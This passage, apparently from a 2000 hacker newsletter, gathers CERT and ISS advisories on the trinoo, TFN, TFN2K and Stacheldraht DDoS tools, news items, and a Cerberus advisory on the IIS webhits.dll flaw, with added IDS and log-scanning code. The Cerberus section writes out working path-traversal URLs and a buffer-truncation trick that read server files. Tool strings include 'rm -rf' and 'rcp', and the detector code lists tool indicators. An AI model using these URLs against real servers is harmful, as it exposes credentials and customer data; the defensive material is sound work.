We have received reports of intruders installing distributed denial of service tools. Tools we have encountered utilize distributed technology to create large networks of hosts capable of launching large coordinated packet flooding denial of service attacks.

We have seen distributed tools installed on hosts that have been compromised due to exploitation of known vulnerabilities. In particular, we have seen vulnerabilities in various RPC services exploited. For more information see the following CERT Incident Notes:

  IN-99-04, Similar Attacks Using Various RPC Services
  IN-99-05, Systems Compromised Through a Vulnerability in am-utils

Two of the tools we have seen are known as trinoo (or trin00) and tribe flood network (or TFN). These tools appear to be undergoing active development, testing, and deployment on the Internet.

Descriptions

  Trinoo
  Tribe Flood Network

Trinoo

Trinoo is a distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. For more information about various UDP flood attacks, please see CERT Advisory CA-96.01.

A trinoo network consists of a small number of servers, or masters, and a large number of clients, or daemons. A denial of service attack utilizing a trinoo network is carried out by an intruder connecting to a trinoo master and instructing that master to launch a denial of service attack against one or more IP addresses.
The trinoo master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time.

  1. intruder -------> master;  destination port 27665/tcp
  2. master   -------> daemons; destination port 27444/udp
  3. daemons  -------> UDP flood to target with randomized destination ports

The binary for the trinoo daemon contains IP addresses for one or more trinoo masters. When the trinoo daemon is executed, the daemon announces its availability by sending a UDP packet containing the string "*HELLO*" to its programmed trinoo master IP addresses.

  daemon -------> masters; destination port 31335/udp

The trinoo master stores a list of known daemons in an encrypted file named "..." in the same directory as the master binary. The trinoo master can be instructed to send a broadcast request to all known daemons to confirm availability. Daemons receiving the broadcast respond to the master with a UDP packet containing the string "PONG".

  1. intruder -------> master;  destination port 27665/tcp
  2. master   -------> daemons; destination port 27444/udp
  3. daemons  -------> master;  destination port 31335/udp

All communications to the master on port 27665/tcp require a password, which is stored in the daemon binary in encrypted form. All communications with the daemon on port 27444/udp require the UDP packet to contain the string "l44" (that's a lowercase L, not a one).

The source IP addresses of the packets in a trinoo-generated UDP flood attack are not spoofed in versions of the tool we have seen. Future versions of the tool could implement IP source address spoofing. Regardless, a trinoo-generated denial of service attack will most likely appear to come from a large number of different source addresses.
We have seen trinoo daemons installed under a variety of different names, but most commonly as

  ns
  http
  rpc.trinoo
  rpc.listen
  trinix
  rpc.irix
  irix

Running strings against the daemon and master binaries produces output similar to this (we have replaced master IP address references in the daemon binary with X.X.X.X)

  trinoo daemon          trinoo master

  socket                 ---v
  bind                   v1.07d2+f3+c
  recvfrom               trinoo %s
  %s %s %s               l44adsl
  aIf3YWfOhw.V.          sock
  PONG                   0nm1VNMXqRMyM
  *HELLO*                15:08:41
  X.X.X.X                Aug 16 1999
  X.X.X.X                trinoo %s [%s:%s]
  X.X.X.X                bind
                         read
                         *HELLO*
  ... rest omitted ...

Tribe Flood Network

TFN, much like Trinoo, is a distributed tool used to launch coordinated denial of service attacks from many sources against one or more targets. In addition to being able to generate UDP flood attacks, a TFN network can also generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast (e.g., smurf) denial of service attacks. TFN has the capability to generate packets with spoofed source IP addresses. Please see the following CERT Advisories for more information about these types of denial of service attacks.

  CA-96.01, TCP SYN Flooding and IP Spoofing Attacks
  CA-98.01, "smurf" IP Denial of Service Attacks

A denial of service attack utilizing a TFN network is carried out by an intruder instructing a client, or master, program to send attack instructions to a list of TFN servers, or daemons. The daemons then generate the specified type of denial of service attack against one or more target IP addresses. Source IP addresses and source ports can be randomized, and packet sizes can be altered.

A TFN master is executed from the command line to send commands to TFN daemons. The master communicates with the daemons using ICMP echo reply packets with 16 bit binary values embedded in the ID field, and any arguments embedded in the data portion of the packet. The binary values, which are definable at compile time, represent the various instructions sent between TFN masters and daemons.
Use of the TFN master requires an intruder-supplied list of IP addresses for the daemons. Some reports indicate recent versions of TFN master may use blowfish encryption to conceal the list of daemon IP addresses. Reports also indicate that TFN may have remote file copy (e.g., rcp) functionality, perhaps for use for automated deployment of new TFN daemons and/or software version updating in existing TFN networks.

We have seen TFN daemons installed on systems using the filename td. Running strings on the TFN daemon binary produces output similar to this.

  %d.%d.%d.%d
  ICMP
  Error sending syn packet.
  tc: unknown host
  3.3.3.3
  mservers
  randomsucks
  skillz
  rm -rf %s
  ttymon
  rcp %s@%s:sol.bin
  %s
  nohup ./%s
  X.X.X.X
  X.X.X.X
  lpsched
  sicken
  in.telne

Solutions

Distributed attack tools leverage bandwidth from multiple systems on diverse networks to produce very potent denial of service attacks. To a victim, an attack may appear to come from many different source addresses, whether or not IP source address spoofing is employed by the attacker. Responding to a distributed attack requires a high degree of communication between Internet sites. Prevention is not straightforward because of the interdependency of site security on the Internet; the tools are typically installed on compromised systems that are outside of the administrative control of eventual denial of service attack targets.

There are some basic suggestions we can make regarding distributed denial of service attacks:

Prevent installation of distributed attack tools on your systems

  Remain current with security-related patches to operating systems and applications software.
  Follow security best-practices when administrating networks and systems.
Prevent origination of IP packets with spoofed source addresses

  For a discussion of network ingress filtering, refer to RFC 2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing

Monitor your network for signatures of distributed attack tools

  Sites using intrusion detection systems (e.g., IDS) may wish to establish patterns to look for that might indicate trinoo or TFN activity based on the communications between master and daemon portions of the tools.
  Sites who use pro-active network scanning may wish to include tests for installed daemons and/or masters when scanning systems on your network.

If you find a distributed attack tool on your systems

  It is important to determine the role of the tools installed on your system. The piece you find may provide information that is useful in locating and disabling other parts of distributed attack networks. We encourage you to identify and contact other sites involved.

If you are involved in a denial of service attack

  Due to the potential magnitude of denial of service attacks generated by distributed networks of tools, the target of an attack may be unable to rely on Internet connectivity for communications during an attack. Be sure your security policy includes emergency out-of-band communications procedures with upstream network operators or emergency response teams in the event of a debilitating attack.

In November 1999, experts addressed issues surrounding distributed-systems intruder tools. The DSIT Workshop produced a paper where workshop participants examine the use of distributed-system intruder tools and provide information about protecting systems from attack by the tools, detecting the use of the tools, and responding to attacks.

  Results of the Distributed-Systems Intruder Tools Workshop

Acknowledgments

The CERT/CC would like to acknowledge and thank our constituency and our peers for important contributions to the information used in this Incident Note.
This document is available from: http://www.cert.org/incident_notes/IN-99-07.html

Articles of interest:

Characterizing and Tracing Packet Floods Using Cisco Routers
http://www.cisco.com/warp/public/707/22.html
Improving Security on Cisco Routers
http://www.cisco.com/warp/public/707/21.html
Internet Security Advisories:
http://www.cisco.com/warp/public/707/advisory.html

Additional info, ISS advisory on Trinoo/Tribe variants:

ISS Security Alert
February 9, 2000

Denial of Service Attack using the TFN2K and Stacheldraht programs

Synopsis:

A new form of Distributed Denial of Service (DDoS) attack has been discovered following the release of the trin00 and Tribe Flood Network (TFN) denial of service programs (see December 7, 1999 ISS Security Alert at http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful than any previous denial of service attack observed on the Internet. A Distributed Denial of Service attack is designed to bring a network down by flooding target machines with large amounts of traffic. This traffic can originate from many compromised machines, and can be managed remotely using a client program. ISS X-Force considers this attack a high risk since it can potentially impact a large number of organizations. DDoS attacks have proven to be successful and are difficult to defend against.

Description:

Over the last two months, several high-capacity commercial and educational networks have been affected by DDoS attacks. In addition to the trin00 and TFN attacks, two additional tools are currently being used to implement this attack: TFN2K and Stacheldraht. Both of these tools are based on the original TFN/trin00 attacks described in the December ISS Security Alert. Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or Stacheldraht) on hundreds of compromised machines and direct this network of machines to initiate an attack against single or multiple victims.
This attack occurs simultaneously from these machines, making it more dangerous than any DoS attack launched from a single machine.

Technical Information:

TFN2K:

The TFN2K distributed denial of service system consists of a client/server architecture.

The Client:

The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded. The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program.

The Master Server:

The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password when it is selected by the user at compile time.

The Attack:

The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are recommended in the TFN/trin00 December 7, 1999 ISS Security Alert. TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms.

Stacheldraht (Barbed Wire):

Stacheldraht consists of three parts: the master server, client, and agent programs.

The Client:

The client is used to connect to the master server on port 16660 or port 60001.
Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines.

The Master Server:

The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client.

The Agent:

The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server. The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image as well as accepting commands to execute flood attacks against target machines.

The Attack:

Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth.
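Added example (HWA editorial addition, not part of the CERT note or the ISS alert): a small C classifier that turns the trinoo control-channel facts from IN-99-07 above (27665/tcp, 27444/udp carrying "l44", 31335/udp carrying "*HELLO*" or "PONG") and the Stacheldraht indicators just described (ports 16660, 60001 and 65000, ICMP echo replies with ID 666 to 669 and the plaintext markers) into the kind of pattern the CERT note suggests tuning an IDS for. The packet record type, the function names and the sample traffic are constructed here; the ISS text gives the Stacheldraht ports without a protocol, so both TCP and UDP are matched.

```c
#include <stdio.h>
#include <string.h>

/* One summarised packet, as a sniffer or IDS would hand it over (constructed
 * record type; only the fields the two write-ups use as indicators are kept). */
typedef enum { PROTO_ICMP = 1, PROTO_TCP = 6, PROTO_UDP = 17 } proto_t;

typedef struct {
    proto_t proto;
    unsigned dst_port;     /* TCP/UDP destination port, 0 for ICMP */
    unsigned icmp_type;    /* ICMP type; 0 is echo reply */
    unsigned icmp_id;      /* ICMP identifier field */
    const char *payload;   /* printable payload / ICMP data, NUL-terminated */
} pkt_t;

/* Returns a label for the control-channel indicator the packet matches, or
 * NULL. A port alone is weak evidence (any service may reuse it), so the
 * trinoo UDP rules also require the literal strings the tool sends. */
const char *classify_ddos_control(const pkt_t *p) {
    const char *d = p->payload ? p->payload : "";

    /* trinoo: intruder -> master, password-protected TCP control port */
    if (p->proto == PROTO_TCP && p->dst_port == 27665)
        return "trinoo intruder->master (27665/tcp)";
    /* trinoo: master -> daemon, every packet must contain "l44" */
    if (p->proto == PROTO_UDP && p->dst_port == 27444 && strstr(d, "l44"))
        return "trinoo master->daemon (27444/udp, l44)";
    /* trinoo: daemon -> master, "*HELLO*" on start-up, "PONG" to a broadcast */
    if (p->proto == PROTO_UDP && p->dst_port == 31335 &&
        (strstr(d, "*HELLO*") || strstr(d, "PONG")))
        return "trinoo daemon->master (31335/udp)";

    /* Stacheldraht ports from the ISS alert (protocol not stated there) */
    if ((p->proto == PROTO_TCP || p->proto == PROTO_UDP) &&
        (p->dst_port == 16660 || p->dst_port == 60001))
        return "stacheldraht client->master (16660 or 60001)";
    if ((p->proto == PROTO_TCP || p->proto == PROTO_UDP) && p->dst_port == 65000)
        return "stacheldraht master->agent (65000)";

    /* Stacheldraht heartbeat: ICMP echo reply, ID 666..669, plaintext marker */
    if (p->proto == PROTO_ICMP && p->icmp_type == 0) {
        int id_hit  = p->icmp_id >= 666 && p->icmp_id <= 669;
        int str_hit = strstr(d, "skillz") || strstr(d, "ficken") ||
                      strstr(d, "spoofworks");
        if (id_hit && str_hit) return "stacheldraht ICMP heartbeat";
        if (id_hit || str_hit) return "possible stacheldraht ICMP control";
    }
    /* TFN proper uses compile-time chosen ID values, so there is no fixed ID
     * to match; unsolicited echo replies carrying data are the lead there. */
    return NULL;
}

/* Runs the classifier over n packets; returns the hit count and, when
 * out_labels is not NULL, stores each matched label in order. */
size_t scan_packets(const pkt_t *pkts, size_t n, const char **out_labels) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        const char *label = classify_ddos_control(&pkts[i]);
        if (label) {
            if (out_labels) out_labels[hits] = label;
            hits++;
        }
    }
    return hits;
}

/* Constructed sample traffic (not a capture): four tool packets, two benign. */
static const pkt_t SAMPLE[] = {
    { PROTO_UDP,  27444, 0, 0,    "xx l44 yy" },
    { PROTO_UDP,  31335, 0, 0,    "*HELLO*" },
    { PROTO_ICMP, 0,     0, 667,  "skillz" },
    { PROTO_TCP,  16660, 0, 0,    "" },
    { PROTO_UDP,  53,    0, 0,    "example" },       /* ordinary DNS */
    { PROTO_ICMP, 0,     0, 1234, "abcdefgh" },      /* ordinary ping reply */
};
#define SAMPLE_N (sizeof SAMPLE / sizeof SAMPLE[0])

size_t scan_sample(void) { return scan_packets(SAMPLE, SAMPLE_N, NULL); }

int main(void) {
    const char *labels[SAMPLE_N];
    size_t hits = scan_packets(SAMPLE, SAMPLE_N, labels);
    for (size_t i = 0; i < hits; i++) printf("hit: %s\n", labels[i]);
    printf("%zu of %zu packets matched\n", hits, (size_t)SAMPLE_N);
    return 0;
}
```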
Possible methods for detection of these flooding attacks are discussed in the TFN/trin00 ISS Security Alert published December 7, 1999. Stacheldraht runs on Linux and Solaris machines.

Detecting TFN2K/Stacheldraht related attacks:

ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial of Service attacks that these distributed tools use, providing early warning and response capabilities. RealSecure can reconfigure firewalls and routers to block the traffic. On some firewalls this can be as granular as blocking a particular service or protocol port. In conjunction with the December 7, 1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the communications between the distributed components of TFN and trin00. RealSecure will add signatures to detect TFN2K and Stacheldraht in its next release, which will also include an X-press Update capability to speed future signature deployment.

Additional Information:

ISS worked in coordination with CERT, SANS, and the NIPC. The following is additional information regarding these DDoS attacks:

- Advisory CA-2000-01 Denial-of-Service Developments
  http://www.cert.org/advisories/CA-2000-01.html
- SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000
- http://www.fbi.gov/nipc/trinoo.htm
- http://staff.washington.edu/dittrich/misc/stacheldraht.analysis

About ISS

ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services, and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S.
commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc.

@HWA

09.0 Teen charged with hacking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm

Student charged with hacking
Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria.
BY HOWARD MINTZ
Mercury News Staff Writer

A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers.

In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities.

According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges.

The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers.

The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system. Authorities have no evidence that Pentchev used the credit card numbers to commit fraud.

Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe.
That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards.

In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system. "He wasn't careful about mopping up after himself," Lee said.

Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter. If convicted, Pentchev faces a maximum penalty of 17 years in prison.

Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236.

@HWA

10.0 Major security flaw found on Microsoft product
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exclusive: Major security flaw hits Microsoft
http://www.zdnet.co.uk/news/2000/3/ns-12942.html
Thu, 27 Jan 2000 17:03:47 GMT
Will Knight

More embarrassment for Microsoft security as yet another flaw is discovered. Will Knight brings you this exclusive report

A British security expert claims to have uncovered a major security flaw in Microsoft's Web server software, Internet Information Server 4 (IIS). David Litchfield, a Windows NT specialist with British firm Cerberus Information Security, says the latest exploit against a Microsoft product allows a malicious hacker to gain unauthorised access to sensitive files, including cached or stored credit card details, address information, user IDs and passwords.

Of most concern is the way these details can be seized: typing a simple URL into any browser makes it possible to gain access to files on Web servers running IIS that have not been specifically configured to disable the exploit.

According to Litchfield, the situation is serious. "It takes no expertise [to use this technique] at all. It's so easy to exploit, I dare not give out a specific example.
It would just fall into the hands of script kiddies [a copycat who uses someone else's techniques to hack a system]." ZDNet UK News has a copy of the exploit technique.

Thousands of e-commerce Web sites use IIS, prompting Litchfield to warn a number of high profile UK e-commerce sites he believed were vulnerable. Last year Microsoft suffered a major PR blow when its Hotmail service -- the world's leading Web based email service -- was left open to attack by a similarly simple hacking technique.

But it is not just Microsoft's products that are vulnerable to attack: there have been several security breaches of high-profile e-commerce Web sites illustrating the precarious nature of the fledgling technology. Visa, for example, recently confirmed receiving ransom demands from individuals claiming to be able to bring down their computer system. E-commerce Web site CDUniverse was also struck by a computer hacker who stole hundreds of credit card numbers and published them on the Internet.

Mark Tennant, Microsoft product manager for NT Server, told ZDNet UK News Thursday that although Microsoft products had made headlines recently for its security flaws, it was to be expected. "This product is a mainstream product with millions of users, obviously with that many users flaws are more likely to be picked up."

Ostensibly that might be true, but to observers, those who see Microsoft products hacked time and again, isn't it a worrying pattern? Tennant disagrees and drew comparisons with Linux "which doesn't have millions of users so you therefore don't hear of this type of issue". He added: "Microsoft is completely committed to security."

Asked if that commitment could guarantee Windows 2000 -- NT's big brother due next month -- would not suffer the same sort of security flaws as its predecessor, Tennant said: "I cannot predict what could happen a month down a line... but we are committed to security."
Litchfield suggests the pressure put on organisations to get online, by both government and software houses, has led to companies leaving themselves wide open to computer criminals. "The World Wide Web is a hacker's paradise," he remarks. "The lure of e-commerce as an effective channel to further promote a business and fuel its success has led to too many companies getting 'connected' too quickly, sacrificing security for speed."

Security consultant Neil Barrett from another security firm, UK Information Risk Management, agrees: "The Holy Grail to any hacker is the remote access exploit. In the past problems with IIS have mainly been denial of service. If this exploit does what it says it does, it's down to how well credit card details are protected on a system which we know from experience is not very well at all." As a first defence Barrett advises either an intrusion detection system or encryption or ideally "both".

Full details of the exploit are available from the Cerberus Web site at this address: http://www.cerberus-infosec.co.uk/adviishtw.html and a patch for Internet Information Server 4 may be downloaded from the Microsoft security home page.
@HWA

11.0 Cerberus Information Security Advisory (CISADV000126)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: win2k security list
Date: Jan 26th

Cerberus Information Security Advisory (CISADV000126)
http://www.cerberus-infosec.co.uk/advisories.html

Released           : 26th January 2000
Name               : Webhits.dll buffer truncation
Affected Systems   : Microsoft Windows NT 4 running Internet Information Server 4, All Service Packs
Issue              : Attackers can access files outside of the web virtual directory system and view ASP source
Author             : David Litchfield (mnemonix@globalnet.co.uk)
Microsoft Advisory : http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

Internet Information Server 4.0 ships with an ISAPI application webhits.dll that provides hit-highlighting functionality for Index Server. Files that have the extension .htw are dispatched by webhits.dll. A vulnerability exists in webhits however that allows an attacker to break out of the web virtual root file system and gain unauthorized access to other files on the same logical disk drive, such as customer databases, log files or any file they know or can ascertain the path to. The same vulnerability can be used to obtain the source of Active Server Pages or any other server side script file, which often contain UserIDs and passwords as well as other sensitive information.

*** WARNING ****
Even if you have no .htw files on your system you're probably still vulnerable! A quick test to show if you are vulnerable: go to

  http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw

If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable. Cerberus Information Security's free vulnerability scanner - CIS - now contains a check for this issue - available from the website http://www.cerberus-infosec.co.uk/
*** WARNING ****

Details
*******

This vulnerability exploits two problems and for the sake of clarity this section will be split into two.
1) If you DO have .htw files on your system
****************************************

The hit-highlighting functionality provided by Index Server allows a web user to have a document returned with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebHitsFile argument. webhits.dll, the ISAPI application that deals with the request, opens the file, highlights accordingly and returns the resulting page. Because the user has control of the CiWebHitsFile argument passed to the .htw file they can request pretty much anything they want. A secondary problem to this is that the source of ASP and other scripted pages can be revealed too. However, webhits.dll will follow double dots and so an attacker is able to gain access to files outside of the web virtual root. For example, to view the web access logs for a given day the attacker would build the following URL:

http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

Sample .htw files often installed and left on the system are:

/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback)

2) If you DON'T have any .htw files on your system
**************************************************

To invoke the webhits.dll ISAPI application a request needs to be made to a .htw file, but if you don't have any on your web server you might wonder why you are still vulnerable - requesting a non-existent .htw file will fail. The trick is to be able to get inetinfo.exe to invoke webhits.dll but then also get webhits.dll to access an existing file. We achieve this by crafting a special URL. First we need a valid resource. This must be a static file such as a .htm, .html, .txt or even a .gif or a .jpg.
This will be the file opened by webhits.dll as the template file. Now we need to get inetinfo.exe to pass it along to webhits for dispatch, and the only way we can do this is by requesting a .htw file.

http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

will fail. Obviously. There is no such file on the system with that name. Notice we've now invoked webhits, however, and by placing a specific number of spaces (%20s) between the existing resource and the .htw it is then possible to trick the web service: the buffer that holds the name of the .htw file to open is truncated, causing the .htw part to be removed, and therefore when it comes to webhits.dll attempting to open the file it succeeds and we are then returned the contents of the file we want to access without there actually being a real .htw file on the system.

The code is probably doing something similar to this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fd;

int DoesTemplateExist(char *pathtohtwfile)
{
    // Just in case inetinfo.exe passes too long a string
    // let's make sure it's of a suitable length and not
    // going to open a buffer overrun vulnerability
    char *file;
    file = (char *)malloc(250);
    strncpy(file, pathtohtwfile, 250);
    // strncpy() leaves the copy unterminated when the source is
    // 250 bytes or longer, so nothing past byte 249 survives
    file[249] = '\0';
    fd = fopen(file, "r");
    free(file);
    // Success
    if (fd != NULL)
    {
        return 1;
    }
    // failed
    else
    {
        return 0;
    }
}

Here webhits.dll "contains" a function called DoesTemplateExist() which is passed a pointer to a 260 byte long string buffer containing the path to the .htw file to open, but this buffer is further reduced in length by the strncpy() function, removing whatever was stored in the last ten bytes (in this case the .htw of the HTTP REQUEST_URI), so when fopen() is called it succeeds. This happens because Windows NT will ignore trailing spaces in a file name.

Solution
********

.htw needs to be unassociated from webhits.dll. To do this open the Internet Server Manager (MMC).
In the left hand pane right click the computer you wish to administer and from the menu that pops up choose Properties. From the Master Properties select the WWW Service and then click Edit. The WWW Service Master Properties window should open. From here click on the Home Directory tab and then click the Configuration button. You should be presented with an App Mappings tab in the Application Mappings window. Find the .htw extension, highlight it, then click on Remove. If a confirmation window pops up select Yes to remove. Finally click on Apply, select all of the child nodes this should apply to, and then OK that. Now close all of the WWW Service property windows.

About Cerberus Information Security, Ltd
****************************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities, leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole, ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services.

Founded in late 1999 by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serve customers across the World.
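As an added example (mine, not Cerberus' code and not anything from webhits.dll), the truncation described in the Details section above is modelled in Python next to a hardened version of the same check, and a few constructed IIS W3C log lines are scanned for the two request shapes the advisory describes: '..' inside CiWebHitsFile, and spaces padded in front of the .htw suffix. The 250-byte copy length comes from the advisory's reconstruction; the file names, the log lines and the detection rules are my assumptions.

```python
import re
from urllib.parse import unquote

COPY_LEN = 250   # length of the copy the advisory believes webhits.dll makes

# Constructed stand-in for files under the web root (hypothetical, not a real server).
WEB_ROOT_FILES = {"default.htm", "qfullhit.htw"}


def webhits_opens(request_name):
    """Model of the defect in the advisory: inetinfo.exe dispatches only names
    ending in .htw, webhits.dll then copies at most COPY_LEN bytes of the name,
    and NT ignores trailing spaces when the file is opened.  Returns the file
    that would actually be opened, or None."""
    if not request_name.lower().endswith(".htw"):
        return None                       # never handed to webhits.dll at all
    opened = request_name[:COPY_LEN].rstrip(" ")
    return opened if opened in WEB_ROOT_FILES else None


def webhits_opens_hardened(request_name):
    """Hardened form: refuse any name that the length limit or the trailing-space
    rule would alter, then require that the file opened really is a .htw template."""
    if len(request_name) > COPY_LEN or request_name != request_name.rstrip(" "):
        return None
    if not request_name.lower().endswith(".htw"):
        return None
    return request_name if request_name in WEB_ROOT_FILES else None


# Constructed IIS W3C extended log lines (not from any real server); the fields
# are: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-01-21 10:00:01 10.0.0.5 GET /default.htm - 200
2000-01-21 10:00:02 10.0.0.9 GET /iissamples/issamples/oop/qfullhit.htw CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 200
2000-01-21 10:00:03 10.0.0.9 GET /default.htm%20%20%20%20.htw CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 200
2000-01-21 10:00:04 10.0.0.7 GET /iissamples/issamples/oop/qfullhit.htw CiWebHitsFile=/iissamples/issamples/oop/default.htm&CiRestriction=test&CiHiliteType=Full 200
"""


def suspicious_htw_requests(log_text):
    """Return (cs-uri-stem, reason) for every .htw request that shows one of the
    two patterns in the advisory: '..' traversal inside CiWebHitsFile, or spaces
    padded in front of the .htw suffix."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        stem, query = unquote(fields[4]), unquote(fields[5])
        if not stem.lower().endswith(".htw"):
            continue
        params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
        target = params.get("CiWebHitsFile", "")
        reasons = []
        if ".." in target.replace("\\", "/").split("/"):
            reasons.append("traversal in CiWebHitsFile")
        if re.search(r" +\.htw$", stem, re.IGNORECASE):
            reasons.append("space-padded .htw name")
        if reasons:
            findings.append((stem, ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    # 11 + 245 + 4 = 260 bytes, the buffer length the advisory mentions
    padded = "default.htm" + " " * 245 + ".htw"
    print("vulnerable opens:", webhits_opens(padded))            # default.htm
    print("hardened opens:  ", webhits_opens_hardened(padded))   # None
    for stem, why in suspicious_htw_requests(SAMPLE_LOG):
        print(f"{why}: {stem}")
```

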